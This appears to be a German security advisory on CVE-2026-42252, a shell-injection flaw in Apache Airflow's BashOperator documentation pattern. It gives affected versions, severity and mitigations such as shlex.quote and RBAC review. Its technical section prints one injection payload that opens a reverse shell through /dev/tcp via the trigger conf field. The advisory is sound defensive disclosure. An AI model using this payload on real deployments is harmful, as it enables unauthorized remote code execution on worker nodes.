„`html
Zusammenfassung
CVE-2026-42252 ist eine kritische Shell-Injection-Anfälligkeit in Apache Airflow, die durch unsichere Dokumentationsbeispiele verursacht wird. Die offizielle Dokumentation zeigte ein BashOperator-Beispiel ohne Quoting oder Sanitization-Warnung. Dag-Autoren, die dieses Muster kopiert haben, exponieren ihre Deployments gegenüber Shell-Metacharacter-Injektionen über das Trigger-API-Feld conf.
Betroffene Systeme
- Produkt: Apache Airflow
- Versionen: Alle Versionen mit dem fehlerhaften Dokumentationsmuster vor PR 64129
- Schweregrad: Critical (CVSS 9.1)
- Angriffsvektor: Network (authentifiziert)
Besonders gefährdet sind Multi-Team-Deployments und gehostete Offerings, die Trigger-API-Zugriff mit Dag.can_trigger-Berechtigung exponieren.
Technische Details
Die problematische Dokumentation zeigte:
BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")
Ein authentifizierter Benutzer mit Trigger-Berechtigung kann Shell-Metacharacter einschleusen:
"; bash -i >& /dev/tcp/[IP]/9999 0>&1; #"
Dies führt zu unautorisierter Command-Execution auf dem Worker-Knoten. Die Anfälligkeit entsteht durch direkte Variable-Interpolation ohne Shell-Escaping. Das Dokumentations-Update in PR 64129 führt explizites Shell-Quoting und Sicherheitswarnungen ein.
Empfohlene Massnahmen
- Upgrade: Apache Airflow auf Version 3.2.2 oder später aktualisieren
- Code-Review: Alle Dag-Definitionen überprüfen, die dem alten Dokumentationsmuster folgen
- Quoting hinzufügen: Bash-Commands mit Shell-Escaping aktualisieren, z.B.
shlex.quote() - RBAC prüfen: Dag.can_trigger-Berechtigungen überprüfen und einschränken
- Monitoring: Unerwartete Worker-Aktivitäten überwachen
Bewertung
CVSS-Score: 9.1 (Critical)
Die hohe Bewertung reflektiert hohes Impact-Potenzial (Remote Code Execution) bei niedriger Angriffskomplexität. Allerdings erfordert die Ausnutzung Authentifizierung und spezifische Deployment-Konfigurationen, was die praktische Bedrohung limitiert.
„`